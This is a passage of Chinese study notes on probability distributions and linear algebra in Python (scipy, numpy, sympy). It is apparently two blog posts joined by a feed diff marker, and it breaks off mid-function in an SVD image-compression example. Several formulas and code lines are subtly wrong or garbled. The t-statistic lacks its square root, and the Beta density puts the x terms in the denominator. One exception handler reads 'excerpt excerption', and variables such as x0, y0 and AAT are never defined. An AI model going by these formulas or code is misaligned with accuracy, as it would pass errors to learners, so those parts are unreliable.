    t 分布$Z\sim t(n)$0(偶函数)$X\sim N(0,1),Y\sim \chi^2(n), t=\frac{X}{Y/n}$当$n\to \infty$时, 分布无限趋近于标准正态分布
    F 分布$F\sim F(n _ {1},n _ {2}$设$U\sim \chi^2(n _ {1}),V\sim \chi^2(n _ {2})$且$U,V$相互独立, $F=\frac{U/n _ {1}}{V/ n _ {2}}$
    $\Gamma$分布$X\sim \Gamma(\alpha,\beta)$“指数分布”和“卡方分布”都是伽马分布的特例
    beta 分布$X\sim Beta(a,b)$$\frac{\alpha}{\alpha+\beta}$$\frac{\alpha\beta}{(\alpha+\beta)^2(\alpha+\beta+1)}$可以看作是一个概率的概率分布,$x$实际上是对某个随机事件发生的概率估计,$\alpha-1$和$\beta-1$实际上描述了随机事件发生或不发生的次数

    9.1.3 应用 Python 函数库计算正态分布

    1.产生正态随机变量

    1
    2
    3
    4
    5
    6
    7
    from scipy.stats import norm

    print(norm.rvs(), end="\n\n") # 产生一个标准正态分布(均值为 0, 标准差为 1)的随机值

    print(norm.rvs(size=10), end="\n\n") # 产生 10 个标准正态分布的随机值

    print(norm.rvs(loc=10, scale=0.1), end="\n\n") # 产生一个均值为 10, 标准差为 0.1 的正态分布随机值
    -0.15606449742155645[ 1.41915385e+00  9.05180924e-01 -1.65805601e+00 -8.70872873e-05  6.25728572e-01  3.07949177e+00  5.22917613e-01 -6.20181230e-01 -1.23960758e+00  7.47657082e-02]9.901121362547995

    2.计算正态分布概率

    1
    2
    3
    4
    5
    from scipy.stats import norm

    print("P(X < 0.3) = {}".format(norm.cdf(0.3)))

    print("P(-0.2 < X < 0.2) = {}".format(norm.cdf(0.2) - norm.cdf(-0.2)))
    P(X < 0.3) = 0.6179114221889526P(-0.2 < X < 0.2) = 0.15851941887820603

    3.标准正态分布函数图形

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import numpy as np
    import scipy.stats as stats
    import matplotlib.pyplot as plt
    import matplotlib.style as style
    import matplotlib as mpl
    from IPython.core.display import HTML

    # PLOTTING CONFIG 绘图配置
    """
    其实%matplotlib inline 这一句是 IPython 的魔法函数,可以在 IPython 编译器里直接使用,作用是内嵌画图,省略掉 plt.show()这一步,直接显示图像。
    如果不加这一句的话,我们在画图结束之后需要加上 plt.show()才可以显示图像。
    """
    %matplotlib inline
    mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    mpl.rcParams['axes.unicode_minus'] = False
    style.use('fivethirtyeight')
    plt.rcParams["figure.figsize"] = (14, 7)
    plt.figure(dpi=100) # 把分辨率调到 100

    # PDF 概率密度函数
    plt.plot(np.linspace(-4, 4, 100),
    stats.norm.pdf(np.linspace(-4, 4, 100))
    / np.max(stats.norm.pdf(np.linspace(-3, 3, 100))),
    )
    plt.fill_between(np.linspace(-4, 4, 100),
    stats.norm.pdf(np.linspace(-4, 4, 100))
    / np.max(stats.norm.pdf(np.linspace(-3, 3, 100))),
    alpha=.15,
    )
    # CDF 累积分布函数
    plt.plot(np.linspace(-4, 4, 100),
    stats.norm.cdf(np.linspace(-4, 4, 100)),
    )

    # LEGEND 图例
    plt.text(x=-1.5, y=.7, s="pdf (normed)", rotation=65,
    alpha=.75, weight="bold", color="#008fd5")
    plt.text(x=-.4, y=.5, s="cdf", rotation=55, alpha=.75,
    weight="bold", color="#fc4f30")

    # TICKS 坐标轴
    plt.tick_params(axis = 'both', which = 'major', labelsize = 18)
    plt.axhline(y = 0, color = 'black', linewidth = 1.3, alpha = .7)

    # TITLE 标题
    plt.text(x = -5, y = 1.25, s = "正态分布 - 概述",
    fontsize = 26, weight = 'bold', alpha = .75)
    plt.text(x = -5, y = 1.1,
    s = ('下图是归一化的概率密度函数 (pdf)以及正态分布随机变量 $ y \sim \mathcal{N}(\mu,\sigma) $的累计密度函数(cdf),'
    '其中 $ \mu = 0 $ , $ \sigma = 1$.'),
    fontsize = 19, alpha = .85)
    Text(-5, 1.1, '下图是归一化的概率密度函数 (pdf)以及正态分布随机变量 $ y \\sim \\mathcal{N}(\\mu,\\sigma) $的累计密度函数(cdf),其中 $ \\mu = 0 $ , $ \\sigma = 1$.')

    png

    9.3 泊松分布

    当二项分布中 n 较大, p 较小时, 分布近似于泊松分布, 可以减少计算量

    $$P{X=k}=C^{k} _ {n}(\frac{\lambda}{n})k(1-\frac{\lambda}{n}){n-k}\approx \frac{\lambdak}{k!}e{-\lambda}$$

    若$X$服从参数为$n,p$的二项分布$b(n, p)$,则$X$近似地服从参数为$\lambda=np$的泊松分布

    泊松分布适合描述一段时间(空间)内随机事件发生次数的概率分布. 如一段时间内到达地铁站的人数等.

    9.6 Beta 分布

    Beta 分布可以看作一个概率的概率分布.这个推断实际上是一个后验概率, 可以用贝叶斯公式转换成先验概率的计算, 公式如下:

    $$f(p|X=k)=\frac{P(X=k|p)f(p)}{P(X=k)}$$

    定义 9.8 给定参数$\alpha>0$和$\beta>0$取值范围为$[0,1]$的随机变量$x$的概率密度函数为

    $$Beta(x;\alpha,\beta)=\frac{1}{B(\alpha,\beta)x{\alpha-1}(1-x){\beta-1}}$$

    其中$B(\alpha,\beta)$称为 Beta 函数, 可以表示为

    $$B(\alpha, \beta)=\frac{\Gamma(\alpha)\Gamma(\beta)}{\Gamma(\alpha+\beta)}$$

    Beta 分布有以下特点:

    • Beta(1, 1)等价于 U(0, 1)

    • 作为概率的概率分布, $Beta(x;\alpha,\beta)$上对 x 的积分必定为 1

    • x 实际上是对某个随机事件发生的概率估计, $\alpha-1$和$\beta-1$实际上描述了随机事件发生或不发生的次数

    • Beta 分布是一种后验分布和先验分布的分布律相同的分布, 不同的只是参数发生了变化

    • Beta 分布可以看作多次进行二项分布实验所得到的分布, 可以对随机事件发生的概率的分布进行计算

    9.7 综合实例——估算棒球运动员的击中率

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    # IMPORTS
    import numpy as np
    import scipy.stats as stats
    import matplotlib.pyplot as plt
    import matplotlib.style as style
    from IPython.core.display import HTML

    # PLOTTING CONFIG
    %matplotlib inline
    style.use('fivethirtyeight')
    plt.rcParams["figure.figsize"] = (14, 7)

    plt.figure(dpi=100)

    # PDF
    # 中 82, 不中 220
    plt.plot(np.linspace(0, 1, 500),
    stats.beta.pdf(np.linspace(0, 1, 500),a=82,b=220),label='a=82,b=220', \
    linewidth=1
    )

    # 中 84, 不中 220
    plt.plot(np.linspace(0, 1, 500),
    stats.beta.pdf(np.linspace(0, 1, 500),a=84,b=220),label='a=84,b=220', \
    linewidth=2, linestyle='dashed'
    )

    # 中 182, 不中 420
    plt.plot(np.linspace(0, 1, 500),
    stats.beta.pdf(np.linspace(0, 1, 500),a=182,b=420),label='a=182,b=420', \
    linewidth=3
    )

    #AXISES LABEL
    plt.xlabel('X',size=20)
    plt.ylabel('Density of Beta',size=20)

    # TICKS
    plt.tick_params(axis = 'both', which = 'major', labelsize = 18)
    plt.xticks(np.linspace(0,1,11))

    #SHOWING TEXT IN CANVAS
    plt.legend()

    plt.show()

    png

    9.9 习题

    (1) 已知正态随机变量$X\sim N(0,1)$,如果有$P{X < x _ {1}}=0.1$, $P{X < x _ {2}}=0.05$, 对应的$x _ {1}$、$x _ {2}$分别称为正态分布的下分位点, 求$x _ {1}$、$x _ {2}$

    $x _ {1} = \varphi^{-1}(0.1)$

    $x _ {2} = \varphi^{-1}(0.05)$

    1
    2
    3
    4
    5
    from scipy.stats import norm

    x1 = norm.ppf(0.1) # 累计密度函数的反函数
    x2 = norm.ppf(0.05)
    x1, x2
    (-1.2815515655446004, -1.6448536269514729)

    (2) 对于标准正态分布$X\sim N(0,1)$, 绘制正态分布曲线及下 0.05 分位点

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import matplotlib.pyplot as plt
    from scipy.stats import norm
    import numpy as np

    plt.plot(np.linspace(-3, 3, 100), norm.pdf(np.linspace(-3, 3, 100))) # 绘制曲线
    plt.fill_between(np.linspace(-3, norm.ppf(0.05), 50),
    norm.pdf(np.linspace(-3, norm.ppf(0.05), 50)),
    alpha=.15,
    )
    plt.plot([x0, x0], [y0, 0], 'k--', lw=2.5) # 绘制黑色虚线
    plt.annotate("x2= %.2f" % x0, xy=(x0, y0), xycoords='data', xytext=(+30, +30),
    textcoords='offset points', fontsize=16, arrowprops=dict(arrowstyle='->',
    connectionstyle='arc3, rad=.2')) # 输入注释

    plt.show() # 显示图片


    png

    ]]>
    @@ -10131,7 +10131,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80(5-6)/ - 正文:2 核心篇

    5 将研究对象形式化——线性代数基础

    5.3.3 矩阵的创建

    直接生成

    import numpy as np

    A = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]
    arr1 = np.array(A)
    print("A=", A)
    print("arr1=\n", arr1)
    B = ((1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12))
    arr2 = np.array(B)
    print("B=", B)
    print("arr2=\n", arr2)

    print("type(A)=", type(A))
    print("type(B)=", type(B))
    print("type(arr1)=", type(arr1))
    print("arr1.shape=", arr1.shape)
    A= [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]arr1= [[ 1  2  3  4] [ 5  6  7  8] [ 9 10 11 12]]B= ((1, 2, 3, 4), (5, 6, 7, 8), (9, 10, 11, 12))arr2= [[ 1  2  3  4] [ 5  6  7  8] [ 9 10 11 12]]type(A)= <class 'list'>type(B)= <class 'tuple'>type(arr1)= <class 'numpy.ndarray'>arr1.shape= (3, 4)

    间接创建

    import numpy as np

    arr1 = np.random.random((2, 3))
    print("arr1=\n", arr1)
    arr2 = np.random.randint(3, 30, size=[2, 3]) # 3-30(不包括 30)
    print("arr2=\n", arr2)
    arr1= [[0.7888749  0.29995777 0.79464025] [0.48565204 0.77377983 0.84873221]]arr2= [[19 17  7] [ 4 25 14]]

    改变矩阵的大小

    import numpy as np

    A = [1, 2, 3, 4, 5, 6]
    B = np.array(A)
    C1 = B.reshape(2, 3)
    C2 = B.reshape(3, 2)
    print("B=", B)
    print("C1=\n", C1)
    print("C2=\n", C2)
    B= [1 2 3 4 5 6]C1= [[1 2 3] [4 5 6]]C2= [[1 2] [3 4] [5 6]]

    矩阵元素的存取

    C1[0]  # 第 0 行
    array([1, 2, 3])
    C1[0:2]  #  0-2(不含 2)行
    array([[1, 2, 3],       [4, 5, 6]])
    C2[[0, 2]]  # 第 0 行和第 2 行
    array([[1, 2],       [5, 6]])
    C2[:, 1]  # 第 1 列
    array([2, 4, 6])
    C2[:, 0:2]  # 0-2(不含 2)列
    array([[1, 2],       [3, 4],       [5, 6]])
    C1[:, [0, 2]]  # 第 0 列和第 2 列
    array([[1, 3],       [4, 6]])
    C2[2, 1]  # 第 2 行第 1 列
    6
    C2[2][1]  # 第 2 行第 1 列
    6

    5.3.4 向量的创建

    import numpy as np

    A = [[1, 2, 3, 4, 5]]
    B = [[1], [2], [3], [4], [5]]
    C = np.array(A)
    D = np.array(B)
    print("C=\n", C)
    print("D=\n", D)
    print("C.shape", np.shape(C))
    print("D.shape", np.shape(D))
    C= [[1 2 3 4 5]]D= [[1] [2] [3] [4] [5]]C.shape (1, 5)D.shape (5, 1)

    5.4 特殊的矩阵

    零矩阵

    np.zeros(10)
    array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0.])
    np.zeros((2, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.]])
    np.array([np.zeros(10)])
    array([[0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]])

    单位矩阵

    np.eye(3)
    array([[1., 0., 0.],       [0., 1., 0.],       [0., 0., 1.]])
    np.identity(3)
    array([[1., 0., 0.],       [0., 1., 0.],       [0., 0., 1.]])

    对角矩阵

    arr1 = np.diag([1, 2, 3])
    arr1
    array([[1, 0, 0],       [0, 2, 0],       [0, 0, 3]])
    np.diag(arr1)
    array([1, 2, 3])

    上三角矩阵

    A = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]])
    np.triu(A, 0)
    array([[ 1,  2,  3,  4],       [ 0,  6,  7,  8],       [ 0,  0, 11, 12],       [ 0,  0,  0, 16]])
    np.tril(A, 0)
    array([[ 1,  0,  0,  0],       [ 5,  6,  0,  0],       [ 9, 10, 11,  0],       [13, 14, 15, 16]])

    判断矩阵是否相等

    A = np.array([[1, 2, 3], [4, 5, 6]])
    B = np.array([1, 2, 3, 4, 5, 6]).reshape(2, 3)
    np.allclose(A, B)
    True

    5.5 矩阵基本操作

    5.5.3 矩阵乘法

    A = np.array([[1, 2], [1, 0]])
    B = np.diag([2, 2])
    A.dot(B) # 矩阵乘法 AB
    array([[2, 4],       [2, 0]])
    A * B  # np.array 类型, * 表示对应元素相乘
    array([[2, 0],       [0, 0]])
    np.multiply(A, B)
    array([[2, 0],       [0, 0]])
    A = np.mat([[1, 2], [1, 0]])
    B = np.mat(np.diag([2, 2]))
    A * B # np.mat 类型, * 表示矩阵乘法
    matrix([[2, 4],        [2, 0]])

    5.5.5 矩阵的乘方

    只有方阵才可进行乘方运算.对 array 类型, 矩阵的乘方要经多次 dot 运算得到, 对 matrix 类型, 可以通过 ** 得到, array 类型的 ** 是每个元素的 n 次方

    A = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
    A_array = np.array(A)
    A_matrix = np.mat(A)
    A_array.dot(A_array).dot(A_array)
    array([[ 468,  576,  684],       [1062, 1305, 1548],       [1656, 2034, 2412]])
    A_array ** 3
    array([[  1,   8,  27],       [ 64, 125, 216],       [343, 512, 729]], dtype=int32)
    A_matrix ** 3
    matrix([[ 468,  576,  684],        [1062, 1305, 1548],        [1656, 2034, 2412]])

    5.6.1 转置矩阵

    利用转置矩阵创建对称矩阵

    import numpy as np

    arr1 = np.random.randint(1, 16, size=[3, 3])
    arr2 = np.triu(arr1)
    arr2 += arr2.T - np.diag(np.diag(arr2))

    print("arr1=\n", arr1)
    print("arr2=\n", arr2)
    print(np.allclose(arr2, arr2.T))
    arr1= [[ 8 14 15] [13 13 12] [ 3  8 12]]arr2= [[ 8 14 15] [14 13 12] [15 12 12]]True

    5.6.2 逆矩阵

    import numpy as np

    A = [[1, 2], [2, 5]]
    C1 = np.array(A)
    C2 = np.mat(A)
    C1_inverse = np.linalg.inv(C1) # array 类型不能使用 C1.I
    C2_inverse = C2.I
    print("C1_inverse=\n", C1_inverse)
    print("C2_inverse=\n", C2_inverse)
    print("C1.dot(C1_inverse)=\n", C1.dot(C1_inverse))
    C1_inverse= [[ 5. -2.] [-2.  1.]]C2_inverse= [[ 5. -2.] [-2.  1.]]C1.dot(C1_inverse)= [[1. 0.] [0. 1.]]
    C2 ** (-1)
    matrix([[ 5., -2.],        [-2.,  1.]])

    “导致降维”, 行列式为 0 的矩阵不可逆

    try:
    np.mat([[0, 0], [0, 1]]) ** (-1)
    excerpt excerption as e:
    print(e)
    Singular matrix

    5.7.4 行列式的计算

    np.linalg.det(np.diag([1, 2, 3, 4]))  # np.linalg 线性代数
    23.999999999999993

    5.8.4 矩阵的秩

    np.linalg.matrix_rank(np.diag([1, 2, 3]))
    3
    np.linalg.matrix_rank(np.diag([1, 2, 0]))
    2

    5.9.1 向量的内积

    A = [[1, 2, 3]]
    B = [[4, 5, 6]]
    C1 = np.array(A).reshape(3, 1) # 转换成列向量
    C2 = np.array(B).reshape(3, 1)
    np.dot(C1.T, C2)
    array([[32]])

    5.9.2 向量的长度

    A = np.array([[0, 3, 4]])
    np.linalg.norm(A)
    5.0

    5.9.4 标准正交基

    定义 5.17 在复数范围内满足$ATA=AAT=E$, 则称$A$为酉矩阵
    酉矩阵常用于奇异值分解(SVD)中, 正交矩阵是实数特殊化的酉矩阵

    综合实例——线性代数在实际问题中的应用

    解方程组:

    $$
    \left{\begin{matrix}
    x + 2y + z = 7
    \ 2x - y + 3z = 7
    \ 3x + y + 2z =18
    \end{matrix}\right.
    $$

    import numpy as np

    A = np.mat([[1, 2, 1], [2, -1, 3], [3, 1, 2]])
    B = np.mat([7, 7, 18]).reshape(3, 1)
    AB = np.hstack((A, B))
    AB
    matrix([[ 1,  2,  1,  7],        [ 2, -1,  3,  7],        [ 3,  1,  2, 18]])

    1 利用逆矩阵求$AX=B$, $X=A^{-1}B$

    X = A.I * B
    X
    matrix([[ 7.],        [ 1.],        [-2.]])
    A * X  # 验证
    matrix([[ 7.],        [ 7.],        [18.]])

    2 利用 np.linalg.solve()

    np.linalg.solve(A, B)
    matrix([[ 7.],        [ 1.],        [-2.]])

    3 利用 Sympy 库的 solve 函数

    import sympy
    from sympy.abc import x, y, z

    eq = [x + 2 * y + z - 7,
    2 * x - y + 3 * z - 7,
    3 * x + y + 2 * z - 18]
    sympy.solve(eq, [x, y, z])
    {x: 7, y: 1, z: -2}

    解具有无穷解的方程组

    $$
    \left{\begin{matrix}
    x + 2y + z - 2w = 0
    \ 2x + 3y - w = 0
    \ x - y - 5z + 7w = 0
    \end{matrix}\right.
    $$

    import numpy as np

    A = np.array([[1, 2, 1, -2],
    [2, 3, 0, -1],
    [1, -1, -5, 7]])
    np.linalg.matrix_rank(A)
    2
    import sympy
    from sympy.abc import x, y, z, w

    eq = [x + 2 * y + z - 2 * w, 2 * x + 3 * y - w, x - y - 5 * z + 7 * w]
    result = sympy.solve(eq, [x, y, z, w])
    result
    {x: -4*w + 3*z, y: 3*w - 2*z}
    A = {z:1, w:2}
    x = float(result[x].evalf(subs=A))
    y = float(result[y].evalf(subs=A))
    x, y
    (-5.0, 4.0)

    例 5.18 获取数据集的数据 读取 csv 文件

    import pandas as pd
    import numpy as np

    dataset = pd.read_csv("iris.csv")
    data = np.array(dataset)

    5.12 习题

    (1)

    分别使用三种方法求线性方程组的解

    $$
    \left { \begin{matrix}
    x+y+z=2
    \x+2y+4z=3
    \x+3y+9z=5
    \end{matrix}\right .
    $$

    1
    import numpy as np

    A = np.mat([[1, 1, 1],
    [1, 2, 4],
    [1, 3, 9]])
    B = np.mat([2, 3, 5]).reshape(3, 1)
    AB = np.hstack((A, B))
    AB
    matrix([[1, 1, 1, 2],        [1, 2, 4, 3],        [1, 3, 9, 5]])
    A.I * B
    matrix([[ 2. ],        [-0.5],        [ 0.5]])
    2
    np.linalg.solve(A, B)
    matrix([[ 2. ],        [-0.5],        [ 0.5]])
    3
    import sympy
    from sympy.abc import x, y, z

    eq = [x + y + z - 2, x + 2 * y + 4 * z - 3, x + 3 * y + 9 * z - 5]
    sympy.solve(eq, [x, y, z])
    {x: 2, y: -1/2, z: 1/2}

    (2)

    分别创建 3 * 4 阶和 4 * 5 阶的矩阵,元素值为 1-20 的随机整数,计算着两个矩阵的乘积,求这两个矩阵的秩

    import numpy as np

    A = np.random.randint(1, 20, size=[3, 4])
    B = np.random.randint(1, 20, size=[4, 5])
    A, B
    (array([[ 2, 18, 16,  6],        [19,  1, 12, 19],        [11,  9, 18, 17]]), array([[ 7, 14, 14, 14,  6],        [11, 10, 11,  8, 10],        [ 4,  3,  8,  4, 11],        [11, 10, 14,  1,  3]]))
    A.dot(B)
    array([[342, 316, 438, 242, 386],       [401, 502, 639, 341, 313],       [435, 468, 635, 315, 405]])
    np.linalg.matrix_rank(A)
    3
    np.linalg.matrix_rank(B)
    4

    (3)

    求下面矩阵的逆矩阵,求逆矩阵时要先求行列式,行列式不为 0 时逆矩阵存在,之后再进行求逆操作

    $$
    A=\begin{bmatrix}
    1 & 2 & 3 \
    2 & 2 & 1 \
    3 & 4 & 3
    \end{bmatrix}
    $$

    import numpy as np

    A = np.mat([[1, 2, 3],
    [2, 2, 1],
    [3, 4, 3]])
    np.linalg.det(A)
    1.9999999999999993
    A.I
    matrix([[ 1. ,  3. , -2. ],        [-1.5, -3. ,  2.5],        [ 1. ,  1. , -1. ]])

    (4)

    分别创建四阶零矩阵和四阶单位矩阵,以及对角线元素分别为 1,2,3,4 的对角矩阵

    np.zeros((4, 4))
    array([[0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.],       [0., 0., 0., 0.]])
    np.identity(4)
    array([[1., 0., 0., 0.],       [0., 1., 0., 0.],       [0., 0., 1., 0.],       [0., 0., 0., 1.]])
    np.diag([1, 2, 3, 4])
    array([[1, 0, 0, 0],       [0, 2, 0, 0],       [0, 0, 3, 0],       [0, 0, 0, 4]])

    (5)

    创建一个四阶方阵,元素值为 1~20 的随机浮点数,根据其上三角和下三角矩阵创建其对应的对称矩阵

    A = np.random.random(16).reshape(4, 4) * 20
    A
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [11.80703601, 11.72735218,  7.43395284, 14.95671889],       [18.40134451, 17.69715348, 14.43624563,  4.31954707],       [11.07252469,  7.31171911, 16.52018505, 11.79353701]])
    np.triu(A)
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [ 0.        , 11.72735218,  7.43395284, 14.95671889],       [ 0.        ,  0.        , 14.43624563,  4.31954707],       [ 0.        ,  0.        ,  0.        , 11.79353701]])
    np.triu(A).T + np.triu(A) - np.diag(np.diag(A))
    array([[14.08629999,  3.99280371, 13.3828697 , 13.32337192],       [ 3.99280371, 11.72735218,  7.43395284, 14.95671889],       [13.3828697 ,  7.43395284, 14.43624563,  4.31954707],       [13.32337192, 14.95671889,  4.31954707, 11.79353701]])
    np.tril(A).T + np.tril(A) - np.diag(np.diag(A))
    array([[14.08629999, 11.80703601, 18.40134451, 11.07252469],       [11.80703601, 11.72735218, 17.69715348,  7.31171911],       [18.40134451, 17.69715348, 14.43624563, 16.52018505],       [11.07252469,  7.31171911, 16.52018505, 11.79353701]])

    6 从数据中提取重要信息——特征值与矩阵分解

    6.1.4 特征值的实现

    已知
    $$A=
    \begin{bmatrix}
    4 & 2 \
    1 & 5
    \end{bmatrix}
    $$
    求 A 的特征值和特征向量

    $|A-\lambda E|=
    \begin{vmatrix}
    4- \lambda & 2\
    1 & 5 - \lambda
    \end{vmatrix}=0$

    $(4 - \lambda)(5 - \lambda) = 0$

    $\lambda ^ 2 - 9\lambda + 18 = 0$

    特征值: $\lambda _ {1} = 3$, $\lambda _ {2} = 6$

    $A - 3E =
    \begin{bmatrix}
    1 & 2\
    1 & 2
    \end{bmatrix} \to$ 特征向量 $(-2, 1)^T$, 单位化得$(-\frac{2}{5}\sqrt 5,\frac {1}{5}\sqrt 5)^T$

    $A - 6E =
    \begin{bmatrix}
    -2 & 2\
    1 & -1
    \end{bmatrix} \to$ 特征向量 $(1, 1)^T$, 单位正交化得$(-\frac{1}{2}\sqrt 2, -\frac{1}{2}\sqrt 2)^T$

    import numpy as np

    A = np.array([[4, 2], [1, 5]])
    eig_val, eig_vex = np.linalg.eig(A) # eig()函数分别求解特征值和特征向量矩阵
    eig_val  # 特征值
    array([3., 6.])
    eig_vex  # 特征向量矩阵(已标准化)
    array([[-0.89442719, -0.70710678],       [ 0.4472136 , -0.70710678]])

    得特征向量$(-\frac{2}{5}\sqrt 5,\frac {1}{5}\sqrt 5)^T$, $(-\frac{1}{2}\sqrt 2, -\frac{1}{2}\sqrt 2)^T$

    6.3 特征值分解

    特征值分解是将矩阵$A$分解成$A=Q\Sigma Q^{-1}$的形式, 要求矩阵必须是 n 维方阵, 将特征值分解算法推广到所有矩阵之上, 就是更加通用的奇异值分解(SVD)

    6.4 奇异值分解(SVD)

    • 这个知识点本科和考研居然没有学过……大概是因为计算量太大了吧

    • 参考教程【学长小课堂】什么是奇异值分解 SVD–SVD 如何分解时空矩阵

    • SVD 可以将任意的矩阵分解为三个矩阵相乘, 简记为$A=U\Sigma V^T$

    • 其中$U$和$V$是正交矩阵, 分别对应$AAT$和$ATA$的特征向量,$\Sigma$是一个对角矩阵, 对角元素为$A$的特征值(按降序排列), 奇异值$^2$=特征值

    • 可以把$A$看作是一个线性变换,将 A 分解为: $U$旋转, $\Sigma$拉伸, $V^T$旋转

    • 奇异值是非负实数

    • 定理:设 A 和 B 是两个矩阵(注意不限定大小,但是必须满足做矩阵积 AB 和 BA 都有意义),则 AB 与 BA 拥有相同的非零特征值,并且保持相同重数,并且属于非零特征值的特征向量间存在制约关系。为什么 A^TA 与 AA^T 有相同特征值?

    $$A _ {m * n} = U _ {m * m}\Sigma _ {m * n}V _ {m * n}^T$$
    $$
    \begin{bmatrix}
    0 & 1\
    1 & 1\
    1 & 0
    \end{bmatrix}=
    \begin{bmatrix}
    1/\sqrt6 & 1/\sqrt2 & 1/\sqrt3\
    2/\sqrt6 & 0 & -1/\sqrt3\
    1/\sqrt6 & -1/\sqrt2 & 1/\sqrt3
    \end{bmatrix}
    \begin{bmatrix}
    \sqrt3 & 0\
    0 & 1\
    0 & 0
    \end{bmatrix}
    \begin{bmatrix}
    1/\sqrt2 & 1/\sqrt2\
    -1/\sqrt2 & 1/\sqrt2
    \end{bmatrix}
    $$

    import numpy as np

    # A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
    A = np.array([[0, 1], [1, 1], [1, 0]]) # https://zhuanlan.zhihu.com/p/29846048
    A
    array([[0, 1],       [1, 1],       [1, 0]])

    使用定义进行 SVD

    sigmal_val, U = np.linalg.eigh(A.dot(A.T))  # 计算特征值, 左奇异矩阵
    sigmal_sort_id = np.argsort(sigmal_val)[::-1] # 让特征值降序排列
    sigmal_val = np.sort(sigmal_val)[::-1] # 特征值对应的特征向量也对应排序
    U = U[:, sigmal_sort_id] # 左奇异矩阵按这个 id 排序
    sigmal = np.diag(np.sqrt(sigmal_val)) # 计算奇异值矩阵(方阵)
    sigmal_inv = np.linalg.inv(sigmal) # 奇异值矩阵的逆矩阵
    V_part_T = sigmal_inv.dot(U.T).dot(A) # 右奇异矩阵

    print("AAT=:\n", AAT)
    print("左奇异矩阵: \n", U)
    print("奇异值矩阵: \n", np.round(sigmal, 2))
    print("右奇异矩阵的转置(部分):\n", np.round(V_part_T, 6))
    AAT=: [[1 1 0] [1 2 1] [0 1 1]]左奇异矩阵:  [[ 4.08248290e-01 -7.07106781e-01  5.77350269e-01] [ 8.16496581e-01 -7.58447699e-17 -5.77350269e-01] [ 4.08248290e-01  7.07106781e-01  5.77350269e-01]]奇异值矩阵:  [[1.73 0.   0.  ] [0.   1.   0.  ] [0.   0.   0.  ]]右奇异矩阵的转置(部分): [[ 0.707107  0.707107] [ 0.707107 -0.707107] [ 0.        0.      ]]
    np.round(U.dot(sigmal).dot(V_part_T), 2)
    array([[0., 1.],       [1., 1.],       [1., 0.]])

    不研究了, 费劲, 怪不得考研不考, 电脑都鼓捣老半天, 别说手算了

    使用 numpy.linalg.svd 进行 SVD

    U, s, VT = np.linalg.svd(A)
    Sigma = np.zeros(np.shape(A)) # 先创建一个零矩阵
    Sigma[:len(s), :len(s)] = np.diag(s) # 将该矩阵的对角元素替换为奇异值
    print("左奇异矩阵: \n", U)
    print("奇异值:\n", s)
    print("奇异值矩阵: \n", Sigma)
    print("右奇异矩阵的转置:\n", VT)
    左奇异矩阵:  [[-4.08248290e-01  7.07106781e-01  5.77350269e-01] [-8.16496581e-01  5.55111512e-17 -5.77350269e-01] [-4.08248290e-01 -7.07106781e-01  5.77350269e-01]]奇异值: [1.73205081 1.        ]奇异值矩阵:  [[1.73205081 0.        ] [0.         1.        ] [0.         0.        ]]右奇异矩阵的转置: [[-0.70710678 -0.70710678] [-0.70710678  0.70710678]]
    np.round(U.dot(Sigma).dot(VT), 2)
    array([[ 0.,  1.],       [ 1.,  1.],       [ 1., -0.]])

    6.5.4 利用 SVD 进行矩阵近似

    在下述 A 中, SVD 得到的特征值前两项较大(343, 25),最后一项较小(3.37). 通过取不同的 k 值, 分别对应取$U$列, $\Sigma$变成 k 阶方阵,$V^T$取前 k 行, 对比利用矩阵乘积得到的新矩阵与原始数据的情况

    import numpy as np

    A = np.array([[1, 5, 7, 6, 1], [2, 1, 10, 4, 4], [3, 6, 7, 5, 2]])
    A
    array([[ 1,  5,  7,  6,  1],       [ 2,  1, 10,  4,  4],       [ 3,  6,  7,  5,  2]])
    U, s, VT = np.linalg.svd(A)
    Sigma = np.zeros(np.shape(A)) # 先创建一个零矩阵
    Sigma[:len(s), :len(s)] = np.diag(s) # 将该矩阵的对角元素替换为奇异值

    for k in range(3, 0, -1):
    D = U[:, :k].dot(Sigma[:k, :k].dot(VT[:k, :]))
    print("k=", k, "压缩后的矩阵: \n", np.round(D, 1))
    k= 3 压缩后的矩阵:  [[ 1.  5.  7.  6.  1.] [ 2.  1. 10.  4.  4.] [ 3.  6.  7.  5.  2.]]k= 2 压缩后的矩阵:  [[ 2.   5.4  6.8  5.3  1.5] [ 2.   1.  10.   4.   4. ] [ 2.1  5.7  7.2  5.6  1.5]]k= 1 压缩后的矩阵:  [[1.9 3.8 7.7 4.8 2.3] [2.1 4.1 8.2 5.1 2.4] [2.  4.  8.1 5.  2.4]]

    可以选取合适的 k 值, 保留较大的奇异值和特征向量, 实现用较少的数据量达到较好的矩阵近似效果.

    6.6 综合实例 1 ——利用 SVD 对图像进行压缩

    from PIL import Image
    import numpy as np
    import matplotlib.pyplot as plt


    def get_approx_SVD1(data, percent):
    """
    SVD 并还原压缩后的数据, 取整体奇异值的百分比
    :param data: 原始矩阵
    :param percent: 奇异值总和百分比
    """
